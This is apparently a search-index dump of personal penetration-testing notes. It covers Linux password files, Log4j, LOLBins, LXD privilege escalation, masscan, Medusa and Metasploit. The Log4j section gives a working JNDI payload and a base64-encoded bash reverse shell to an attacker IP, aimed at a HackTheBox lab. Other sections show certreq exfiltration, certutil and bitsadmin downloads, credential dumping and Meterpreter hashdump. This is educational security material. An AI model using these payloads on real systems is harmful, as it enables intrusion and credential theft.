                        The type (id) is the cryptographic hash method used to encrypt the password. Many different cryptographic hash methods were used in the past and are still used by some systems today.

                        ID Cryptographic Hash Algorithm $1$ MD5 $2a$ Blowfish $5$ SHA-256 $6$ SHA-512 $sha1$ SHA1crypt $y$ Yescrypt $gy$ Gost-yescrypt $7$ Scrypt

                        The /etc/shadow file can only be read by the user root.

                        ","tags":["linux"]},{"location":"linux/#passwd-file","title":"Passwd file","text":"

                        The /etc/passwd

                        htb-student:    x:  1000:   1000:   ,,,:    /home/htb-student:  /bin/bash\n<username>:     <password>:     <uid>:  <gid>:  <comment>:  <home directory>:   <cmd executed after logging in>\n

                        The x in the password field indicates that the encrypted password is in the /etc/shadow file.

                        ","tags":["linux"]},{"location":"linux/#opasswd","title":"Opasswd","text":"

                        The PAM library (pam_unix.so) can prevent reusing old passwords. The file where old passwords are stored is the /etc/security/opasswd. Administrator/root permissions are also required to read the file if the permissions for this file have not been changed manually.

                        # Reading /etc/security/opasswd\nsudo cat /etc/security/opasswd\n\n# cry0l1t3:1000:2:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0,$1$kcUjWZJX$E9uMSmiQeRh4pAAgzuvkq1\n

                        Looking at the contents of this file, we can see that it contains several entries for the user cry0l1t3, separated by a comma (,). Another critical point to pay attention to is the hashing type that has been used. This is because the MD5 ($1$) algorithm is much easier to crack than SHA-512. This is especially important for identifying old passwords and maybe even their pattern because they are often used across several services or applications. We increase the probability of guessing the correct password many times over based on its pattern.

                        ","tags":["linux"]},{"location":"linux/#dumping-memory-and-cache","title":"Dumping memory and cache","text":"

                        mimipenguin lazagne

                        Firefox stored credentials:

                        ls -l .mozilla/firefox/ | grep default \n\ncat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .\n

                        The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.

                        ","tags":["linux"]},{"location":"log4j/","title":"Log4j","text":"

                        This Log4J vulnerability can be exploited by injecting operating system commands (OS Command Injection). Log4j is a popular logging library for Java created in 2001. The logging library's main purpose is to provide developers with a way to change the format and verbosity of logging through configuration files versus code.

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#what-it-does","title":"What it does","text":"

                        What a logging library does, is instead of using print statements, the developer just uses a wrapper around the Logging class or object. So instead of using print(line), the code would look like this:

                        logging.INFO(\u201cApplication Started\u201d)\nlogging.WARN(\u201cFile Uploaded\u201d)\nlogging.DEBUG(\u201cSQL Query Ran\u201d)\n

                        Then the application has a configuration file which says what log levels (INFO, WARN, DEBUG, etc.) to display. This way when there is a problem with the application, the developer can enable DEBUG mode and instantly get the messages they need to identify the issue.

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#reconnaissance-proof-of-concept","title":"Reconnaissance - Proof of Concept","text":"

                        The main way people have been testing if an application is vulnerable is by combining this vulnerability with JNDI.

                        Java Naming and Directory Interface (JNDI) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services, such as Remote Method Invocation (RMI), Common Object Request Broker Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS). By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.

                        In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just one string parameter, and if this parameter comes from an untrusted source, it could lead to remote code execution via remote class loading.

                        LDAP is the acronym forLightweight Directory Access Protocol, which is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network. The default port that LDAP runs on is port 389.

                        Proof of concepts to see if it is vulnerable:

                        1. Grab the request with the injectable parameter.

                        2. In the injectable parameter, inject something like this:

                        \"${jndi:ldap://AtackerIP/whatever}\"\n

                        With tcpdump, check if the request with the payload produces some traffic to your attacker machine:

                        sudo tcpdump -i tun0 port 389\n# -i: Select interface\n# port: indicate the port where traffic is going to be captured. \n

                        The tcpdump output shows a connection being received on our machine. This proves that the application is indeed vulnerable since it is trying to connect back to us on the LDAP port 389.

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#exploitation","title":"Exploitation","text":"
                        # Install Open-JDK and Maven as requirement\nsudo apt install openjdk-11-jre maven\n\ngit clone https://github.com/veracode-research/rogue-jndi \n\ncd rogue-jndi\n\nmvn package\n\n# Once it's build, make a reverse shell in base64 with attacker machine and listening port\necho 'bash -c bash -i >&/dev/tcp/AtackerIP/AtackerPort 0>&1' | base64\n# This will return something similar to this: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK\n\n# Get out of rogue-jndi folder and\njava -jar rogue-jndi/target/RogueJndi-1.1.jar --command \"bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}\" --hostname \"10.129.96.149\"\n# In the bash command, copy paste your reverse shell in base64\n# --hostname: Victim IP\n\n# Now, open a terminal, launch [[netcat]] abd the listening port you defined in your payload.\n

                        With Burpsuite, get a request for login:

                        POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":false,\"strict\":true}\n

                        This request is from HackTheBox machine: Unified. As we can read from the Unifi version exploit, the injectable parameter is \"remember\". So we insert there our payload and with Repeater, send the request:

                        POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":\"${jndi:ldap://10.10.14.2:1389/o=tomcat}\",\"strict\":true}\n

                        Once we send that request, our jndi server will resend the reverse shell:

                        And in our terminal with the nc listener we will get the reverse shell.

                        The misinterpretation of the User-Agent leads to a JNDI lookup which is executed as a command from the system with administrator privileges and queries a remote server controlled by the attacker, which in our case is the\u00a0Destination\u00a0in our concept of attacks. This query requests a Java class created by the attacker and is manipulated for its own purposes. The queried Java code inside the manipulated Java class gets executed in the same process, leading to a remote code execution (RCE) vulnerability. GovCERT.ch has created an excellent graphical representation of the Log4j vulnerability worth examining in detail. Source: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#related-labs","title":"Related labs","text":"

                        Walkthrough HackTheBox machine: Unified.

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"lolbins-lolbas-gtfobins/","title":"LOLbins - \"Living off the land\" binaries: LOLbas and GTFObins","text":"

                        The term LOLBins (Living off the Land binaries) came from a Twitter discussion on what to call binaries that an attacker can use to perform actions beyond their original purpose. There are currently two websites that aggregate information on Living off the Land binaries:

                        • LOLBAS Project for Windows Binaries
                        • GTFOBins for Linux Binaries
                        ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#windows-lolbas","title":"Windows - LOLBAS","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#certreqexe","title":"CertReq.exe","text":"

                        Let's use CertReq.exe as an example.

                        # From the victim's machine we can sec for instance file.txt to our kali\ncertreq.exe -Post -config http://$ipKali c:\\folder\\file.txt\n\n# From the kali machine, the attacking one, we use a netcat session\nsudo nc -lvnp 80\n
                        ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#linux-gtfobins","title":"Linux - GTFOBins","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#openssl","title":"OpenSSL","text":"
                        # Create Certificate in our attacker machine\nopenssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n\n# Stand up the Server in our attacker machine\nopenssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh\n\n# Download File to the victim's Machine, but run command from the attacker kali\nopenssl s_client -connect $ipVictim:80 -quiet > LinEnum.sh\n
                        ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#other-common-living-off-the-land-tools","title":"Other Common Living off the Land tools","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#bitsadmin-download-function","title":"Bitsadmin Download function","text":"

                        The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It \"intelligently\" checks host and network utilization into account to minimize the impact on a user's foreground work.

                        # File Download with Bitsadmin\nbitsadmin /transfer wcb /priority foreground http://$ip:8000/nc.exe C:\\Users\\htb-student\\Desktop\\nc.exe\n

                        PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.

                        # Download\nImport-Module bitstransfer; Start-BitsTransfer -Source \"http://$ip/nc.exe\" -Destination \"C:\\Temp\\nc.exe\"\n
                        ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#download-a-file-with-certutil","title":"Download a File with Certutil","text":"

                        Certutil can be used to download arbitrary files.

                        certutil.exe -verifyctl -split -f http://$ip/nc.exe\n
                        ","tags":["resources","binaries","pentesting"]},{"location":"lxd/","title":"lxd","text":"

                        LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.

                        A member of the local \u201clxd\u201d group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

                        Source: https://www.hackingarticles.in/lxd-privilege-escalation/. In this article, you can find a good explanation about how lxc works. Original source: https://bugs.launchpad.net/ubuntu/+source/lxd/+bug/1829071.

                        ","tags":["privilege escalation","linux","lxd"]},{"location":"lxd/#privileges-escalation","title":"Privileges escalation","text":"

                        Privilege escalation through lxd requires the access of local account and that that local account belongs to the group lxd.

                        In order to take escalate the root privilege of the host machine you have to create an imag for lxd thus you need to perform the following the action:

                        Steps to be performed on the attacker machine:

                        # Download build-alpine in your local machine through the git repository:\ngit clone https://github.com/saghul/lxd-alpine-builder.git\n\n# Execute the script \u201cbuild -alpine\u201d that will build the latest Alpine image as a compressed file, this step must be executed by the root user.\ncd lxd-alpine-builder\nsudo ./build-alpine\n\n# This will generate a tar file that you need to transfer to the victim machine. For that you can copy that file to your /var/www/html folder and start apache2 service.\n

                        Steps to be performed on the victim machine:

                        # Download the alpine image. Go for instance to the /tmp folder and, if you have started the apache2 service in the attacker machine, do a wget:\nwget http://AtackerIP//alpine-v3.17-x86_64-20230508_0532.tar.gz\n\n# After the image is built it can be added as an image to LXD as follows:\nlxc image import ./alpine-v3.17-x86_64-20230508_0532.tar.gz --alias myimage\n\n# List available images:\nlxc image list\n\n# Initiate your image inside a new container\nlxc init myimage ignite -c security.privileged=true\n\n# Mount the container inside the /root directory\nlxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true\n\n# Initialize the container\nlxc start ignite\n\n# Launch a shell command in the container\nlxc exec ignite /bin/sh\n
                        ","tags":["privilege escalation","linux","lxd"]},{"location":"lxd/#related-labs","title":"Related labs","text":"

                        HackTheBox machine Included.

                        ","tags":["privilege escalation","linux","lxd"]},{"location":"m365-cli/","title":"M365 CLI","text":"","tags":["Microsoft 365","pentesting"]},{"location":"m365-cli/#installation","title":"Installation","text":"

                        Source: https://pnp.github.io/cli-microsoft365/cmd/docs/

                        Install m365 cli from: https://github.com/pnp/cli-microsoft365

                        Login into Microsoft:

                        m365 login  \n

                        You will be prompted to open a browser with this url https://microsoft.com/devicelogin Enter the code that prompt message indicates and login as m365 user.

                        ","tags":["Microsoft 365","pentesting"]},{"location":"m365-cli/#ennumeration-techniques","title":"Ennumeration techniques","text":"

                        Get information about the default Power Apps environment.

                        m365 pa environment get  \n

                        List Microsoft Power Apps environments in the current tenant

                        m365 pa environment list \n

                        List all available apps for that user

                        m365 pa app list  \n

                        List all apps in an environment as Admin

                        m365 pa app list --environmentName 00000000-0000-0000-0000-000000000000 --asAdmin  \n

                        Remove an app

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000  \n

                        Removes the specified Power App without confirmation

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --force  \n

                        Removes the specified Power App you don't own

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --environmentName Default- 00000000-0000-0000-0000-000000000000 --asAdmin  \n

                        Add an owner without removing the old one

                        m365 pa app owner set --environmentName 00000000-0000-0000-0000-000000000000 --appName 00000000-0000-0000-0000-000000000000 --userId 00000000-0000-0000-0000-000000000000 --roleForOldAppOwner CanEdit  \n

                        Export an app

                        m365 pa app export --environmentName 00000000-0000-0000-0000-000000000000 --name 00000000-0000-0000-0000-000000000000 --packageDisplayName \"PowerApp\" --packageDescription \"Power App Description\" --packageSourceEnvironment \"Pentesting\" --path ~/Documents\n
                        ","tags":["Microsoft 365","pentesting"]},{"location":"machines/","title":"Machines and lab resources","text":"machine OWASP Juice Shop Is a modern vulnerable web application written in Node.js, Express, and Angular which showcases the entire\u00a0OWASP Top Ten\u00a0along with many other real-world application security flaws. Metasploitable 2 Is a purposefully vulnerable Ubuntu Linux VM that can be used to practice enumeration, automated, and manual exploitation. Metasploitable 3 Is a template for building a vulnerable Windows VM configured with a wide range of\u00a0vulnerabilities. DVWA This is a vulnerable PHP/MySQL web application showcasing many common web application vulnerabilities with varying degrees of difficulty. VAPI vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises. https://overthewire.org/wargames/ The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Linux https://underthewire.tech/wargames The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Windows

                        Pro Lab has a specific scenario and level of difficulty:

                        Lab Scenario Dante Beginner-friendly to learn common pentesting techniques and methodologies, common pentesting tools, and common vulnerabilities. Offshore Active Directory lab that simulates a real-world corporate network. Cybernetics Simulates a fully-upgraded and up-to-date Active Directory network environment, which is hardened against attacks. It is aimed at experienced penetration testers and Red Teamers. RastaLabs Red Team simulation environment, featuring a combination of attacking misconfigurations and simulated users. APTLabs This lab simulates a targeted attack by an external threat agent against an MSP (Managed Service Provider) and is the most advanced Pro Lab offered at this time."},{"location":"mariadb/","title":"MariaDB","text":"

                        MariaDB is an open source relational database management system (RDBMS) that is a compatible drop-in replacement for the widely used MySQL database technology. It is developed by MariaDB Foundation and initially released on 29 October 2009. MariaDB has a significantly high number of new features, which makes it better in terms of performance and user-orientation than MySQL.

                        ","tags":["database","relational database","SQL"]},{"location":"mariadb/#basic-commands","title":"Basic commands","text":"
                        # Get all databases\nshow databases;\n\n# Select a database\nuse <databaseName>;\n\n# Get all tables from the previously selected database\nshow tables; \n\n# Dump columns from a table\ndescribe <table_name>;\n\n# Dump columns from a table\nshow columns from <table>;\n
                        ","tags":["database","relational database","SQL"]},{"location":"mariadb/#connect-to-database-mariadb","title":"Connect to database: mariadb","text":"
                        # -h host/ip   \n# -u user As default mariadb has a root user with no authentication\nmariadb -h <host/IP> -u root\n
                        ","tags":["database","relational database","SQL"]},{"location":"markdown/","title":"Markdown","text":"","tags":["tool","language"]},{"location":"markdown/#titles-code","title":"Titles: code","text":"
                        # H1\n
                        ## H2\n
                        ### H3\n
                        ","tags":["tool","language"]},{"location":"markdown/#formating-the-text","title":"Formating the text","text":"
                        *italic*   \n
                        **bold**\n
                        ==highlight==\n
                        ","tags":["tool","language"]},{"location":"markdown/#blockquote-code","title":"Blockquote code","text":"
                        > blockquote\n
                        ","tags":["tool","language"]},{"location":"markdown/#lists","title":"Lists","text":"

                        Bullets

                        + One bullet\n+ Second Bullet\n+ Third bullet\n

                        Ordered lists

                        1. First item in list\n2. Second item in list\n

                        Item list

                        - First item\n- Second item\n- Third item\n
                        ","tags":["tool","language"]},{"location":"markdown/#horizontal-rule","title":"Horizontal rule","text":"
                        --- \n
                        ","tags":["tool","language"]},{"location":"markdown/#links","title":"Links","text":"
                        [link](https://www.example.com)\n
                        ","tags":["tool","language"]},{"location":"markdown/#image-code","title":"Image: code","text":"
                        ![alt text](image.jpg)\n
                        ","tags":["tool","language"]},{"location":"markdown/#tables","title":"Tables","text":"
                        | ColumnName | ColumnName |\n| ---------- | ---------- |\n| Content | Content that you want |\n
                        ","tags":["tool","language"]},{"location":"markdown/#footnote-code","title":"Footnote: code","text":"
                        Here's a sentence with a footnote. [^1]\n\n[^1]: This is the footnote. \n
                        ","tags":["tool","language"]},{"location":"markdown/#task-list","title":"Task list","text":"
                        - [x] Write the press release\n- [ ] Update the website\n- [ ] Contact the media \n
                        ","tags":["tool","language"]},{"location":"markdown/#fenced-coded-block-code","title":"Fenced coded block: code","text":"
                        \\```\ncode inside\n\\```\n
                        ","tags":["tool","language"]},{"location":"markdown/#strikethrough","title":"Strikethrough","text":"
                        ~~Love is flat.~~ \n
                        ","tags":["tool","language"]},{"location":"markdown/#emojis","title":"Emojis","text":"
                        :emoji-code: \n
                        ","tags":["tool","language"]},{"location":"masscan/","title":"masscan - An IP scanner","text":"

                        Masscan was designed to deal with large networks and to scan thousands of Ip addresses at once. It\u2019s faster than nmap but probably less accurate.

                        ","tags":["reconnaissance","scanning"]},{"location":"masscan/#installation","title":"Installation","text":"
                        sudo apt-get install git gcc make libpcap-dev\ngit clone https://github.com/robertdavidgraham/masscan\ncd masscan/\nmake\n

                        \"make\" puts the program in the masscan/bin subdirectory. To install it (on Linux) run:

                        make install\n

                        The source consists of a lot of small files, so building goes a lot faster by using the multi-threaded build. This requires more than 2gigs on a Raspberry Pi (and breaks), so you might use a smaller number, like -j4 rather than all possible threads.

                        make -j\n

                        Make sure that is running properly:

                        cd bin\n./masscan --regress\n
                        ","tags":["reconnaissance","scanning"]},{"location":"masscan/#usage","title":"Usage","text":"

                        Usage is similar to nmap. To scan a network segment for some ports:

                        ./masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 10.0.2.1/24 -e tcp0 --router-ip 10.0.2.456  --echo >  masscan.conf\n# To see the complete list of options, use the `--echo` feature. This dumps the current configuration and exits. This output can be used as input back into the program:\n

                        Another example:

                        masscan -p80,8000-8100 10.0.0.0/8 2603:3001:2d00:da00::/112\n# This will scan the `10.x.x.x` subnet, and `2603:3001:2d00:da00::x` subnets\n# Scan port 80 and the range 8000 to 8100, or 102 ports total, on both subnets\n# Print output to `<stdout>` that can be redirected to a file\n
                        ","tags":["reconnaissance","scanning"]},{"location":"masscan/#editing-config-file","title":"Editing config file","text":"
                        nano masscan.conf\n# here, you add:  output-filename = scan.list //also json, xml\n

                        Now to tun it again using the configuration file:

                        masscan -c masscan.conf\n
                        ","tags":["reconnaissance","scanning"]},{"location":"medusa/","title":"Medusa","text":"

                        Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"medusa/#installation","title":"Installation","text":"

                        Pre-installed in Kali.

                        wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz\n./configure\nmake\nmake install\n
                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"medusa/#basic-usage","title":"Basic usage","text":"
                        # Brute force FTP logging\nmedusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp -n 2121\n# -u: username\n# -U: list of Usernames\n# -p: password\n# -P: list of passwords\n# -h: host /IP\n# -M: protocol to bruteforce\n# -n: for a different non-default port. For instance, port 2121 for ftp \n
                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"metasploit/","title":"metasploit","text":"

                        Developed in ruby by rapid7. \"Free\" edition preinstalled in Kali at /usr/share/metasploit-framework

                        ","tags":["pentesting"]},{"location":"metasploit/#run-metasploit","title":"Run metasploit","text":"
                        # start the postgresql service\nservice postgresql start \n\n# Initiate database\nsudo msfdb init\u00a0\n\n# Launch metasploit from terminal. -q means without banner\nmsfconsole -q\u00a0 \n
                        ","tags":["pentesting"]},{"location":"metasploit/#update-metasploit","title":"Update metasploit","text":"

                        How to update metasploit database, since msfupdate is deprecated.

                        # Update the whole system\napt update && apt-upgrade -y \u00a0 \n\n# Update libraries and dependencies\napt dist-upgrade\n\n# Reinstall the app\napt install metasploit-framework \n
                        ","tags":["pentesting"]},{"location":"metasploit/#basic-commands","title":"Basic commands","text":"
                        # Help information\nshow -h\u00a0 \n
                        =========================\n\nDatabase Backend Commands\n\n=========================\n\ndb_connect\u00a0 \u00a0 \u00a0 \u00a0 Connect to an existing data service\n\ndb_disconnect \u00a0 \u00a0 Disconnect from the current data service\n\ndb_export \u00a0 \u00a0 \u00a0 \u00a0 Export a file containing the contents of the database\nBefore closing the session, save a backup:\ndb_export -f xml backup.xml\n\ndb_import \u00a0 \u00a0 \u00a0 \u00a0 Import a scan result file (filetype will be auto-detected)\nFor instance: \ndb_import Target.xml\ndb_import Target.nmap\n\ndb_nmap \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Executes nmap and records the output automatically\n\nAfter that, we can query: \nhosts\n# The hosts command displays a database table automatically populated with the host addresses, hostnames, and other information we find about these during our scans and interactions. \nservices. \n# host -h # to see all commands with hosts \n\nservices\n# It contains a table with descriptions and information on services discovered during scans or interactions.\n# services -h # to see all commands with services \n\ncreds\n# The creds command allows you to visualize the credentials gathered during your interactions with the target host.\n# creds -h # to see all commands with creds \n\nloot\n# The loot command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more.\n# loot -h # to see all commands with loot \n\ndb_rebuild_cache\u00a0 Rebuilds the database-stored module cache (deprecated)\n\ndb_remove \u00a0 \u00a0 \u00a0 \u00a0 Remove the saved data service entry\n\ndb_save \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Save the current data service connection as the default to reconnect on startup\n\ndb_status \u00a0 \u00a0 \u00a0 \u00a0 Show the current data service status\n\nhosts \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all hosts in the database\n\nloot\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all loot in the database\n\nnotes \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all notes in the database\n\nservices\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all services in the database\n\nvulns \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all vulnerabilities in the database\n\nworkspace \u00a0 \u00a0 \u00a0 \u00a0 Switch between database \nworkspace         List workspaces\nworkspace -v      List workspaces verbosely\nworkspace [name]  Switch workspace\nworkspace -a [name] ...    Add workspace(s)\nworkspace -d [name] ...    Delete workspace(s)\nworkspace -D     Delete all workspaces\nworkspace -r     Rename workspace\nworkspace -h     Show this help information\n

                        Cheat sheet:

                        # Search modules\nsearch (mysearchitem> \ngrep meterpreter show payloads\ngrep -c meterpreter grep reverse_tcp show payloads\n\n# Search for exploit of service hfs 2.3 serve\nsearchsploit hfs 2.3\n\n#  launch msfconsole and run the reload_all command for the newly installed module to appear in the list\nreload_all\n\n\n# Use a module\u00a0\nuse <name of module (like exploit/cmd/linux/tcp_reverse) or number> \n\n# Show options of current module (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> show options\u00a0\n\n# Configure an option (Watch out, prompt is included)\nmsf\u00a0exploit/cmd/linux/tcp_reverse> set <option> <value> \n\n# Configure an option as a constant during the msf session (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> setg <option> <value> \n\n# Go back to the main msf prompt (Watch out, prompt is included)\nmsf\u00a0exploit/cmd/linux/tcp_reverse> back \n\n# View related information of the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> info \n\n# View related payloads of the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> show payloads \n\n# Set a payload for the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> set payload <value> \n\n# Before we run an exploit-script, we can run a check to ensure the server is vulnerable (Note that no\nt every exploit in the Metasploit Framework supports the `check` function)\nmsf6 exploit(windows/smb/ms17_010_psexec) > check\n\n# Run the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> run\u00a0 \n\n# Run the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> exploit \n\n# Run an exploit as a job by typing exploit -j\nexploit -j\n\n# See all sessions (Watch out, prompt is included)\nmsf> sessions\n\n# Switch to session number n (Watch out, prompt is included)\nmsf> sessions -i <n>\u00a0 \n\n# Kill all sessions (Watch out, prompt is included)\nmsf> sessions -K\u00a0 \n

                        To kill a session we don't use CTRL-C, because the port would be still in use. For that we have jobs

                        +++++++++\njobs\n++++++++++\n    -K        Terminate all running jobs.\n    -P        Persist all running jobs on restart.\n    -S <opt>  Row search filter.\n    -h        Help banner.\n    -i <opt>  Lists detailed information about a running job.\n    -k <opt>  Terminate jobs by job ID and/or range.\n    -l        List all running jobs.\n    -p <opt>  Add persistence to job by job ID\n    -v        Print more detailed info.  Use with -i and -l\n
                        ","tags":["pentesting"]},{"location":"metasploit/#databases","title":"Databases","text":"
                        # Start PostgreSQL\nsudo systemctl start postgresql\n\n# Initiate a Database\nsudo msfdb init\n\n# Check status\nsudo msfdb status\n\n# Connect to the Initiated Database\nsudo msfdb run\n\n# Reinitiate the Database\n[!bash!]$ msfdb reinit\n[!bash!]$ cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/\n[!bash!]$ sudo service postgresql restart\n[!bash!]$ msfconsole -q\nmsf6 > db_status\n
                        ","tags":["pentesting"]},{"location":"metasploit/#plugins","title":"Plugins","text":"

                        To start using a plugin, we will need to ensure it is installed in the correct directory on our machine.

                        ls /usr/share/metasploit-framework/plugins\n

                        If the plugin is found here, we can fire it up inside msfconsole. Example:

                        load nessus\n

                        To install new custom plugins not included in new updates of the distro, we can take the .rb file provided on the maker's page and place it in the folder at /usr/share/metasploit-framework/plugins with the proper permissions. Many people write many different plugins for the Metasploit framework:

                        nMap (pre-installed) NexPose (pre-installed) Nessus (pre-installed) Mimikatz (pre-installed V.1) Stdapi (pre-installed) Railgun Priv Incognito (pre-installed) Darkoperator's

                        ","tags":["pentesting"]},{"location":"metasploit/#meterpreter","title":"Meterpreter","text":"

                        The Meterpreter payload is a specific type of multi-faceted payload that uses DLL injection to ensure the connection to the victim host is stable, hard to detect by simple checks, and persistent across reboots or system changes. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques.

                        When having an active session on the victim machine, the best module to run a Meterpreter is s4u_persistence:

                        use exploit/windows/local/s4u_persistence\n\nshow options\n\nsessions\u00a0\n
                        ","tags":["pentesting"]},{"location":"metasploit/#meterpreter-commands","title":"meterpreter commands","text":"
                        # view all available commands\nhelp \n\n# Obtain a shell. Exit to exit the shell\nshell\u00a0 \n\n# View information about the system\nsysinfo\n\n# View the id that meterpreter assigns to the machine\nmachine_id\n\n# Print the network configuration\nifconfig \n\n# check routing information\nroute \u00a0 \n\n# Download a file\ndownload /path/to/fileofinterest.txt /path/to/ourmachine/destinationfile.txt\n\n# Upload a file\nupload /path/from/source.txt /path/to//destinationfile.txt\n\n# Bypass the authentification. It takes you from normal user to admin\ngetsystem\n# If the operation fails because of priv_elevated_getsystem error message, then use the\u00a0 bypassuac module: use exploit/windows/local/bypassuac\n\n# View who you are\ngetuid  \n\n# View all running processes\nps\n\n# Migrate to a different process with more privileges\nsteal_token <PID>\n\n# View the process that we are\ngetpid\n\n# Dumps the contents of the SAM database\nhashdump      \n\n# Dumps ...\nlsa_dump_sam\n\n# Meterpreter LSA Secrets Dump\nlsa_dump_secrets\n\n# Enumerate the modules available at this meterpreter session\nuse -l \u00a0 \n\n# load a specific module\nuse <name of module>\u00a0 \n\n# View all processes run by the system. This allows us to choose one in order to migrate the process of our persistent connection in order to have one less suspicious.\u00a0\nps -U SYSTEM\u00a0 \n\n# Change to a process\nmigrate\u00a0 <pid>\u00a0 \u00a0 \u00a0 \u00a0 \nmigrate -N lsass.exe\n# -N \u00a0 Look for the lsass.exe process and migrate the process into that. We can do this to run the command: hashdump (we\u2019ll get hashes to use them with john the ripper or ophcrack). Also, we can choose a less suspicious process such as svhost.exe and migrate there.\n\n# Get a windows shell\nexecute -f cmd.exe -i -H\n\n# Display the host ARP cache\narp           \n\n# Display the current proxy configuration\nget proxy\n\n# Display interfaces\nifconfig       \n\n# Display the network connections\nnetstat       \n\n# Forward a local port to a remote service\nportfwd       \n\n# Resolve a set of hostnames on the target\nresolve       \n

                        More commands

